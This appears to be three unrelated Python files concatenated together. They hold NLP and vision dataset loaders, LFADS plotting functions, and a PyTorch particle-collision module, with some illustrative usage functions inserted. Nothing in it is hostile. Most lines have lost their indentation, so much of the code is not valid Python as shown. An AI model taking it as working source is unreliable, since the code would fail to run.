def read_wikiner(file_, tagmap=None):
Xs = []
ys = []
for line in file_:
if not line.strip():
continue
tokens = [t.rsplit('|', 2) for t in line.split()]
words, _, tags = zip(*tokens)
if tagmap is not None:
tags = [tagmap.setdefault(tag, len(tagmap)) for tag in tags]
Xs.append(words)
ys.append(tags)
return zip(Xs, ys)
def read_imdb(data_dir, limit=0):
examples = []
for subdir, label in (('pos', 1), ('neg', 0)):
for filename in (data_dir / subdir).iterdir():
with filename.open('r', encoding='utf8') as file_:
text = file_.read()
text = text.replace('<br />', '\n\n')
if text.strip():
examples.append((text, label))
random.shuffle(examples)
if limit >= 1:
examples = examples[:limit]
return examples
def read_conll(loc): # pragma: no cover
n = 0
with io.open(loc, encoding='utf8') as file_:
sent_strs = file_.read().strip().split('\n\n')
for sent_str in sent_strs:
lines = [line.split() for line in sent_str.split('\n')
if not line.startswith('#')]
words = []
tags = []
for i, pieces in enumerate(lines):
if len(pieces) == 4:
word, pos, head, label = pieces
else:
idx, word, lemma, pos1, pos, morph, head, label, _, _2 = pieces
if '-' in idx:
continue
words.append(word)
tags.append(pos)
yield words, tags
def read_csv(csv_loc, label_col=0, text_col=-1):
with csv_loc.open() as file_:
for row in csv.reader(file_):
label_str = row[label_col]
text = row[text_col]
yield text, label_str
def mnist(): # pragma: no cover
from ._vendorized.keras_datasets import load_mnist
# the data, shuffled and split between tran and test sets
(X_train, y_train), (X_test, y_test) = load_mnist()
X_train = X_train.reshape(60000, 784)
X_test = X_test.reshape(10000, 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255.
X_test /= 255.
train_data = list(zip(X_train, y_train))
nr_train = X_train.shape[0]
random.shuffle(train_data)
heldout_data = train_data[:int(nr_train * 0.1)]
train_data = train_data[len(heldout_data):]
test_data = list(zip(X_test, y_test))
return train_data, heldout_data, test_data
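# A hedged usage sketch added for illustration (not part of the original module):
# mnist() returns three lists of (pixel-vector, label) pairs; the heldout split
# is 10% of the shuffled training data, as implemented above.
def _example_mnist_usage():  # pragma: no cover
    train_data, heldout_data, test_data = mnist()
    X0, y0 = train_data[0]
    # Each image is a flattened 784-float vector scaled to [0, 1].
    assert X0.shape == (784,)
    return len(train_data), len(heldout_data), len(test_data)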
def reuters(): # pragma: no cover
from ._vendorized.keras_datasets import load_reuters
(X_train, y_train), (X_test, y_test) = load_reuters()
return (X_train, y_train), (X_test, y_test)
def quora_questions(loc=None):
if loc is None:
loc = get_file('quora_similarity.tsv', QUORA_QUESTIONS_URL)
if isinstance(loc, basestring):
loc = Path(loc)
is_header = True
lines = []
with loc.open('r', encoding='utf8') as file_:
for row in csv.reader(file_, delimiter='\t'):
if is_header:
is_header = False
continue
id_, qid1, qid2, sent1, sent2, is_duplicate = row
            sent1 = sent1.strip()
            sent2 = sent2.strip()
if sent1 and sent2:
lines.append(((sent1, sent2), int(is_duplicate)))
train, dev = partition(lines, 0.9)
return train, dev
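# A hedged usage sketch added for illustration (not part of the original module):
# each Quora example is a ((question1, question2), is_duplicate) pair, and
# partition() above splits the pairs 90/10 into train/dev.
def _example_quora_usage():  # pragma: no cover
    train, dev = quora_questions()
    (question1, question2), is_duplicate = train[0]
    # is_duplicate is an int label, 0 or 1.
    return question1, question2, is_duplicate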
THREE_LABELS = {'entailment': 2, 'contradiction': 1, 'neutral': 0}
TWO_LABELS = {'entailment': 1, 'contradiction': 0, 'neutral': 0}
def snli(loc=None, ternary=False):
label_scheme = THREE_LABELS if ternary else TWO_LABELS
if loc is None:
loc = get_file('snli_1.0', SNLI_URL, unzip=True)
if isinstance(loc, basestring):
loc = Path(loc)
train = read_snli(Path(loc) / 'snli_1.0_train.jsonl', label_scheme)
dev = read_snli(Path(loc) / 'snli_1.0_dev.jsonl', label_scheme)
return train, dev
def stack_exchange(loc=None):
if loc is None:
raise ValueError("No default path for Stack Exchange yet")
rows = []
with loc.open('r', encoding='utf8') as file_:
for line in file_:
eg = json.loads(line)
rows.append(((eg['text1'], eg['text2']), int(eg['label'])))
train, dev = partition(rows, 0.7)
return train, dev
def read_snli(loc, label_scheme):
rows = []
with loc.open('r', encoding='utf8') as file_:
for line in file_:
eg = json.loads(line)
label = eg['gold_label']
if label == '-':
continue
rows.append(((eg['sentence1'], eg['sentence2']), label_scheme[label]))
return rows
def get_word_index(path='reuters_word_index.pkl'): # pragma: no cover
    import sys
    try:
        import cPickle  # Python 2
    except ImportError:
        import pickle as cPickle  # Python 3
    path = get_file(path, origin='https://s3.amazonaws.com/text-datasets/reuters_word_index.pkl')
    f = open(path, 'rb')
    if sys.version_info < (3,):
        data = cPickle.load(f)
    else:
        data = cPickle.load(f, encoding='latin1')
    f.close()
    return data
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Plotting functions for LFADS and the data RNN example."""
from __future__ import print_function, division, absolute_import
import matplotlib.pyplot as plt
import numpy as onp
from scipy import stats
from sklearn.decomposition import PCA
def plot_data_pca(data_dict):
"""Plot the PCA skree plot of the hidden units in the integrator RNN."""
f = plt.figure()
ndata, ntime, nhidden = data_dict['hiddens'].shape
print('Number of data examples: ', ndata)
print('Number of timesteps: ', ntime)
print('Number of data dimensions: ', nhidden)
pca = PCA(n_components=100)
pca.fit(onp.reshape(data_dict['hiddens'], [ndata * ntime, nhidden]))
plt.plot(onp.arange(1, 16), onp.cumsum(pca.explained_variance_ratio_)[0:15],
'-o');
plt.plot([1, 15], [0.95, 0.95])
plt.xlabel('PC #')
plt.ylabel('Cumulative Variance')
plt.xlim([1, 15])
plt.ylim([0.3, 1]);
return f
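# A hedged usage sketch added for illustration (not part of the original module):
# data_dict is assumed to hold a 'hiddens' array of shape (ndata, ntime, nhidden)
# with nhidden >= 100 so the 100-component PCA above can be fit; the shapes below
# are made up for the example.
def _example_plot_data_pca():
  data_dict = {'hiddens': onp.random.randn(64, 100, 128)}
  return plot_data_pca(data_dict)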
def plot_data_example(input_bxtxu, hidden_bxtxn=None,
output_bxtxo=None, target_bxtxo=None, bidx=None):
"""Plot a single example of the data from the data integrator RNN."""
if bidx is None:
bidx = onp.random.randint(0, input_bxtxu.shape[0])
ntoplot = 10
ntimesteps = input_bxtxu.shape[1]
f = plt.figure(figsize=(10,8))
plt.subplot(311)
plt.plot(input_bxtxu[bidx,:,0])
plt.xlim([0, ntimesteps-1])
plt.ylabel('Input')
plt.title('Example %d'%bidx)
if hidden_bxtxn is not None:
plt.subplot(312)
plt.plot(hidden_bxtxn[bidx, :, 0:ntoplot] + 0.25*onp.arange(0, ntoplot, 1), 'b')
plt.ylabel('Hiddens')
plt.xlim([0, ntimesteps-1]);
  plt.subplot(313)
if output_bxtxo is not None:
plt.plot(output_bxtxo[bidx,:,0].T, 'r');
plt.xlim([0, ntimesteps-1]);
plt.ylabel('Output / Targets')
plt.xlabel('Time')
if target_bxtxo is not None:
plt.plot(target_bxtxo[bidx,:,0], 'k');
plt.xlim([0, ntimesteps-1]);
return f
def plot_data_stats(data_dict, data_bxtxn, data_dt):
"""Plot the statistics of the data integrator RNN data after spikifying."""
print(onp.mean(onp.sum(data_bxtxn, axis=1)), "spikes/second")
f = plt.figure(figsize=(12,4))
plt.subplot(141)
plt.hist(onp.mean(data_bxtxn, axis=1).ravel()/data_dt);
plt.xlabel('spikes / sec')
plt.subplot(142)
plt.imshow(data_dict['hiddens'][0,:,:].T)
plt.xlabel('time')
plt.ylabel('neuron #')
plt.title('Sample trial rates')
plt.subplot(143);
plt.imshow(data_bxtxn[0,:,:].T)
plt.xlabel('time')
plt.ylabel('neuron #')
plt.title('spikes')
plt.subplot(144)
plt.stem(onp.mean(onp.sum(data_bxtxn, axis=1), axis=0));
plt.xlabel('neuron #')
plt.ylabel('spikes / sec');
return f
def plot_losses(tlosses, elosses, sampled_every):
"""Plot the losses associated with training LFADS."""
f = plt.figure(figsize=(15, 12))
for lidx, k in enumerate(tlosses):
plt.subplot(3, 2, lidx+1)
tl = tlosses[k].shape[0]
x = onp.arange(0, tl) * sampled_every
plt.plot(x, tlosses[k], 'k')
plt.plot(x, elosses[k], 'r')
plt.axis('tight')
plt.title(k)
return f
def plot_priors(params):
"""Plot the parameters of the LFADS priors."""
prior_dicts = {'ic' : params['ic_prior'], 'ii' : params['ii_prior']}
pidxs = (pidx for pidx in onp.arange(1,12))
f = plt.figure(figsize=(12,8))
for k in prior_dicts:
for j in prior_dicts[k]:
plt.subplot(2,3,next(pidxs));
data = prior_dicts[k][j]
if "log" in j:
data = onp.exp(data)
j_title = j.strip('log')
else:
j_title = j
plt.stem(data)
plt.title(k + ' ' + j_title)
return f
def plot_lfads(x_txd, avg_lfads_dict, data_dict=None, dd_bidx=None,
renorm_fun=None):
"""Plot the full state ofLFADS operating on a single example."""
print("bidx: ", dd_bidx)
ld = avg_lfads_dict
def remove_outliers(A, nstds=3):
clip = nstds * onp.std(A)
A_mean = onp.mean(A)
A_show = onp.where(A < A_mean - clip, A_mean - clip, A)
return onp.where(A_show > A_mean + clip, A_mean + clip, A_show)
f = plt.figure(figsize=(12,12))
plt.subplot(361)
plt.imshow(x_txd.T)
plt.title('x')
plt.subplot(362)
x_enc = remove_outliers(ld['xenc_t'])
plt.imshow(x_enc.T)
plt.title('x enc')
plt.subplot(363)
gen = remove_outliers(ld['gen_t'])
plt.imshow(gen.T)
plt.title('generator')
plt.subplot(364)
factors = remove_outliers(ld['factor_t'])
plt.imshow(factors.T)
plt.title('factors')
if data_dict is not None:
true_rates = renorm_fun(data_dict['hiddens'][dd_bidx])
plt.subplot(366)
plt.imshow(true_rates.T)
plt.title('True rates')
plt.subplot(365)
rates = remove_outliers(onp.exp(ld['lograte_t']))
plt.imshow(rates.T)
plt.title('rates')
plt.subplot(334)
ic_mean = ld['ic_mean']
ic_std = onp.exp(0.5*ld['ic_logvar'])
plt.stem(ic_mean)
plt.title('g0 mean')
plt.subplot(335)
con = remove_outliers(ld['c_t'])
plt.imshow(con.T)
plt.title('controller')
plt.subplot(336)
ii_mean = ld['ii_mean_t']
plt.plot(ii_mean, 'b')
if data_dict is not None:
true_input = data_dict['inputs'][dd_bidx]
slope, intercept, r_value, p_value, std_err = \
stats.linregress(true_input.T, ii_mean.T)
plt.plot(slope*true_input + intercept, 'm', lw=2)
#plt.plot(ld['ii_t'], 'k')
plt.title('inferred input mean')
plt.legend(('LFADS inferred input', 'rescaled true input to integrator RNN'))
plt.subplot(313)
ntoplot=8
a = 0.25
plt.plot(rates[:, 0:ntoplot] + a*onp.arange(0, ntoplot, 1), 'b')
plt.plot(true_rates[:, 0:ntoplot] + a*onp.arange(0, ntoplot, 1), 'r')
plt.title('LFADS rates (blue), True rates (red)')
plt.xlabel('timesteps')
return f
|
|
import numbers
import numpy as np
import torch
import torch.autograd
import _ext
import _extc
import error_checking as ec
class ReorderData(torch.nn.Module):
""" TODO
"""
def __init__(self, reverse=False):
""" TODO
if reverse: ret[idxs] = input
else: ret = input[idxs]
"""
super(ReorderData, self).__init__()
self.reverse = (1 if reverse else 0)
def forward(self, idxs, locs, data=None):
""" TODO
Inputs:
-locs: A BxNxD tensor where B is the batch size, N is the number
of particles, and D is the dimensionality of the particles'
coordinate space.
-data: [optional] A BxNxC tensor where C is the number of channels.
"""
# Error checking.
batch_size = locs.size()[0]
N = locs.size()[1]
ec.check_tensor_dims(locs, "locs", (batch_size, N, -1))
ec.check_tensor_dims(idxs, "idxs", (batch_size, N))
if data is not None:
ec.check_tensor_dims(data, "data", (batch_size, N, -1))
data = data.contiguous()
no_data = False
else:
data = torch.autograd.Variable(
locs.data.new(), requires_grad=False)
no_data = True
locs = locs.contiguous()
idxs = idxs.contiguous()
        # Do the computation.
coll = _ReorderDataFunction(self.reverse)
locs, data = coll(idxs, locs, data)
if no_data:
return locs
else:
return locs, data
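# A hedged usage sketch added for illustration (not part of the original file):
# ReorderData permutes the particle (N) dimension of locs, and of data when given,
# according to idxs. The tensors below are illustrative only.
def _example_reorder_data_usage():
    batch_size, N = 2, 5
    locs = torch.autograd.Variable(torch.rand(batch_size, N, 3))
    data = torch.autograd.Variable(torch.rand(batch_size, N, 4))
    # A per-batch permutation of the particle indices, stored as floats to match
    # the index tensors produced by the hash grid ordering below.
    idxs = torch.autograd.Variable(
        torch.stack([torch.randperm(N) for _ in range(batch_size)]).float())
    reorder = ReorderData(reverse=False)
    new_locs, new_data = reorder(idxs, locs, data)
    return new_locs, new_data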
class ParticleCollision(torch.nn.Module):
""" TODO
"""
def __init__(self, ndim, radius, max_grid_dim=96, max_collisions=128, include_self=True):
""" Initialize a Particle Collision layer.
Arguments:
-ndim: The dimensionality of the particle's coordinate space.
-radius: The radius to use when computing the neighbors for each query point.
-max_grid_dim: The maximum size of all the dimensions for the internal hash
grid. Set this value lower if you are running out of memory.
-max_collisions: The maximum number of neighbors a particle may have.
-include_self: If False, then if the distance between a query location and the
particle is 0, that particle will not be included in that query
location's neighbor list.
"""
super(ParticleCollision, self).__init__()
self.ndim = ec.check_conditions(ndim, "ndim",
"%s > 0", "%s < " +
str(_ext.spn_max_cartesian_dim()),
"isinstance(%s, numbers.Integral)")
self.radius = ec.check_conditions(radius, "radius",
"%s >= 0", "isinstance(%s, numbers.Real)")
self.max_grid_dim = ec.check_conditions(max_grid_dim, "max_grid_dim",
"%s > 0", "isinstance(%s, numbers.Integral)")
self.max_collisions = ec.check_conditions(max_collisions, "max_collisions",
"%s > 0", "isinstance(%s, numbers.Integral)")
self.include_self = 1 if include_self else 0
self.radixsort_buffer_size = -1
self.register_buffer("cellIDs", torch.zeros(1, 1))
self.register_buffer("cellStarts", torch.zeros(1, max_grid_dim**ndim))
self.register_buffer("cellEnds", torch.zeros(1, max_grid_dim**ndim))
self.register_buffer("cuda_buffer", torch.zeros(1,))
self.reorder = ReorderData(reverse=False)
def forward(self, locs, data=None, qlocs=None):
""" Compute the neighbors of each location. Reorders the locs and data tensors
in place and returns the list of indices in their new order and the list of
neighbors for each location.
Inputs:
-locs: A BxNxD tensor where B is the batch size, N is the number
of particles, and D is the dimensionality of the particles'
coordinate space.
-data: [optional] A BxNxC tensor where C is the number of channels.
Add this to have it reordered alongside locs.
-qlocs: [optional] A BxMxD tensor of query locations. The neighbors
list in the output will be a list of all particles in locs
that neighbor each query location. If not provided, locs is
used instead.
Returns:
-locs: A BxNxD tensor identical to the input locs, except reordered
for optimized memory access.
-data: [optional] A BxNxC tensor identical to the input data reordered
in the same order as locs. If the input data was not provided,
then this is not returned.
-Idxs: BxN tensor with the original index of each particle location in their
new order, e.g., idxs[b, i] = j where b is the batch index, j is
the original index in locs, and i is the new index.
-Neighbors: BxMxK where K is max_neighbors. This lists the indices of
all particles within radius of each query location, up to K. If
there are fewer than K neighbors, -1 is used to indicate
the end of the neighbor list. The indices are with respect to
the reordered locs tensor. If qlocs is not specified, then
locs is used as the query points and it is reordered before
                        being queried, so the neighbors tensor is also reordered.
"""
# Error checking.
batch_size = locs.size()[0]
N = locs.size()[1]
ec.check_tensor_dims(locs, "locs", (batch_size, N, self.ndim))
if data is not None:
ec.check_tensor_dims(data, "data", (batch_size, N, -1))
data = data.contiguous()
has_data = True
else:
has_data = False
if qlocs is not None:
ec.check_tensor_dims(qlocs, "qlocs", (batch_size, -1, self.ndim))
qlocs = qlocs.contiguous()
locs = locs.contiguous()
# Resize the internal buffers to be the right size.
buffers = [self.cellIDs, self.cellStarts, self.cellEnds]
for buf in buffers:
if buf.size()[0] != batch_size:
ns = (batch_size,) + buf.size()[1:]
buf.resize_(ns)
if self.cellIDs.size()[1] != N or self.cellIDs.size()[0] != batch_size + 2:
# Allocate 2 extra batches on cellIDs for sorting.
self.cellIDs.resize_(batch_size + 2, N, 1)
if locs.is_cuda:
if self.radixsort_buffer_size < 0:
self.radixsort_buffer_size = _extc.spnc_get_radixsort_buffer_size()
bufsize = max(self.radixsort_buffer_size,
int(np.prod(locs.size()) + (np.prod(data.size()) if has_data else 0)))
if self.cuda_buffer.size()[0] != bufsize:
self.cuda_buffer.resize_(bufsize)
# Compute grid bounds.
lower_bounds, _ = locs.min(1)
upper_bounds, _ = locs.max(1)
grid_dims = torch.ceil(torch.clamp((upper_bounds - lower_bounds)/self.radius,
0, self.max_grid_dim))
center = (lower_bounds + upper_bounds)/2
lower_bounds = center - grid_dims*self.radius/2
lower_bounds = lower_bounds.contiguous()
grid_dims = grid_dims.contiguous()
# Get the new hashgrid order.
hashorder = _HashgridOrderFunction(self.radius, self.max_grid_dim, self.cellIDs,
self.cuda_buffer)
idxs = hashorder(locs, lower_bounds, grid_dims)
# Reorder the locs and data.
if has_data:
locs, data = self.reorder(idxs, locs, data)
else:
locs = self.reorder(idxs, locs)
        # Do the collision computation.
coll = _ParticleCollisionFunction(self.radius, self.max_collisions, self.cellIDs,
self.cellStarts, self.cellEnds, self.include_self)
neighbors = coll(qlocs if qlocs is not None else locs,
locs, lower_bounds, grid_dims)
if has_data:
return locs, data, idxs, neighbors
else:
return locs, idxs, neighbors
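# A hedged usage sketch added for illustration (not part of the original file):
# build the layer once and call it per step; the return values follow the
# forward() docstring above. The shapes here are made up for the example.
def _example_particle_collision_usage():
    # Two batches of 100 random particles in 3-D, with 4 data channels each.
    locs = torch.autograd.Variable(torch.rand(2, 100, 3))
    data = torch.autograd.Variable(torch.rand(2, 100, 4))
    coll = ParticleCollision(ndim=3, radius=0.1, max_collisions=64)
    locs, data, idxs, neighbors = coll(locs, data)
    # neighbors[b, i] indexes the reordered locs and is padded with -1.
    return locs, data, idxs, neighbors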
"""
INTERNAL FUNCTIONS
"""
class _HashgridOrderFunction(torch.autograd.Function):
def __init__(self, radius, max_grid_dim, cellIDs, cuda_buffer):
super(_HashgridOrderFunction, self).__init__()
self.radius = radius
self.max_grid_dim = max_grid_dim
self.cellIDs = cellIDs
self.cuda_buffer = cuda_buffer
def forward(self, locs, lower_bounds, grid_dims):
self.save_for_backward(locs, lower_bounds, grid_dims)
batch_size = locs.size()[0]
N = locs.size()[1]
idxs = locs.new(batch_size, N)
self.cellIDs.fill_(0)
if locs.is_cuda:
if not _extc.spnc_hashgrid_order(locs, lower_bounds, grid_dims,
self.cellIDs, idxs, self.cuda_buffer, self.radius):
raise Exception("Cuda error")
else:
_ext.spn_hashgrid_order(locs, lower_bounds, grid_dims,
self.cellIDs, idxs, self.radius)
return idxs
def backward(self, grad_idxs):
locs, lower_bounds, grid_dims = self.saved_tensors
return (
grad_idxs.new(locs.size()).fill_(0),
grad_idxs.new(lower_bounds.size()).fill_(0),
grad_idxs.new(grid_dims.size()).fill_(0),)
class _ParticleCollisionFunction(torch.autograd.Function):
def __init__(self, radius, max_collisions, cellIDs, cellStarts, cellEnds,
include_self):
super(_ParticleCollisionFunction, self).__init__()
self.radius = radius
self.max_collisions = max_collisions
self.cellIDs = cellIDs
self.cellStarts = cellStarts
self.cellEnds = cellEnds
self.include_self = include_self
def forward(self, qlocs, locs, lower_bounds, grid_dims):
self.save_for_backward(qlocs, locs, lower_bounds, grid_dims)
batch_size = locs.size()[0]
M = qlocs.size()[1]
neighbors = locs.new(batch_size, M, self.max_collisions)
neighbors.fill_(-1)
self.cellStarts.fill_(0)
self.cellEnds.fill_(0)
if locs.is_cuda:
if not _extc.spnc_compute_collisions(qlocs, locs, lower_bounds, grid_dims, self.cellIDs,
self.cellStarts, self.cellEnds, neighbors, self.radius, self.radius,
self.include_self):
raise Exception("Cuda error")
else:
_ext.spn_compute_collisions(qlocs, locs, lower_bounds, grid_dims, self.cellIDs,
self.cellStarts, self.cellEnds, neighbors, self.radius, self.radius, self.include_self)
return neighbors
def backward(self, grad_neighbors):
qlocs, locs, lower_bounds, grid_dims = self.saved_tensors
return (
grad_neighbors.new(qlocs.size()).fill_(0),
grad_neighbors.new(locs.size()).fill_(0),
grad_neighbors.new(lower_bounds.size()).fill_(0),
grad_neighbors.new(grid_dims.size()).fill_(0),)
class _ReorderDataFunction(torch.autograd.Function):
def __init__(self, reverse):
super(_ReorderDataFunction, self).__init__()
self.reverse = reverse
def forward(self, idxs, locs, data):
self.save_for_backward(idxs,)
nlocs = locs.new(*locs.size())
ndata = locs.new(*data.size())
if locs.is_cuda:
if not _extc.spnc_reorder_data(locs, data, idxs, nlocs, ndata, self.reverse):
raise Exception("Cuda error")
else:
_ext.spn_reorder_data(locs, data, idxs, nlocs, ndata, self.reverse)
return nlocs, ndata
def backward(self, grad_locs, grad_data):
idxs, = self.saved_tensors
nlocs = grad_locs.new(*grad_locs.size())
ndata = grad_data.new(*grad_data.size())
if grad_locs.is_cuda:
if not _extc.spnc_reorder_data(grad_locs, grad_data, idxs, nlocs,
ndata, 1 - self.reverse):
raise Exception("Cuda error")
else:
_ext.spn_reorder_data(grad_locs, grad_data, idxs, nlocs, ndata,
1 - self.reverse)
return idxs.new(idxs.size()).fill_(0), nlocs, ndata
|